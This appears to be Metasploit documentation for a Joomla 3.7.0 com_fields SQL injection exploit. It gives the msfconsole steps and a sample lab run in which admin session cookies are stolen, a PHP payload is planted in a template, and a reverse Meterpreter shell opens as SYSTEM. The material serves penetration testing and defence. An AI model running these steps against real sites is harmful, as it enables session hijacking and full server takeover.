h00die
2.0 KiB
2.0 KiB
Vulnerable Application
This module exploits a SQL Injection vulnerability in the com_fields component which was introduced to the core of Joomla in version 3.7.0.
With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work. If a session hijack is available, one of the website templates is identified, and our payload is added to the template as a new file, and then executed.
Verification Steps
- Start msfconsole
- Do:
use exploit/unix/webapp/joomla_comfields_sqli_rce - Do:
set rhost [ip] - Do:
set tageturi [uri] - Do:
exploit - Get a shell
Scenarios
Joomla 3.7.0 on Windows 7 SP1 with Super User authenticated
msf5 exploit(unix/webapp/joomla_comfields_sqli_rce) > run
[*] Started reverse TCP handler on 172.22.222.138:4444
[*] 172.22.222.122:80 - Retrieved table prefix [ unqi0 ]
[*] 172.22.222.122:80 - Retrieved cookie [ ejn9i2c5srk6gchhai4cikdkm3 ]
[*] 172.22.222.122:80 - Retrieved unauthenticated cookie [ 33effe3d96e4c5e749f33b9d639ca36b ]
[+] 172.22.222.122:80 - Successfully authenticated
[*] 172.22.222.122:80 - Creating file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Following redirect to [ /joomlatest/administrator/index.php?option=com_templates&view=template&id=503&file=L3pNOFp2SUFBd3hFLnBocA%3D%3D ]
[*] 172.22.222.122:80 - Token [ df2760a9614efc2566917148ee379c42 ] retrieved
[*] 172.22.222.122:80 - Template path [ /templates/beez3/ ] retrieved
[*] 172.22.222.122:80 - Insert payload into file [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Payload data inserted into [ zM8ZvIAAwxE.php ]
[*] 172.22.222.122:80 - Executing payload
[*] Sending stage (37543 bytes) to 172.22.222.122
[+] Deleted zM8ZvIAAwxE.php
meterpreter > getuid
Server username: SYSTEM (0)
meterpreter > sysinfo
Computer : WIN-V438RLMESAE
OS : Windows NT WIN-V438RLMESAE 6.1 build 7601 (Windows 7 Professional Edition Service Pack 1) AMD64
Meterpreter : php/windows
meterpreter >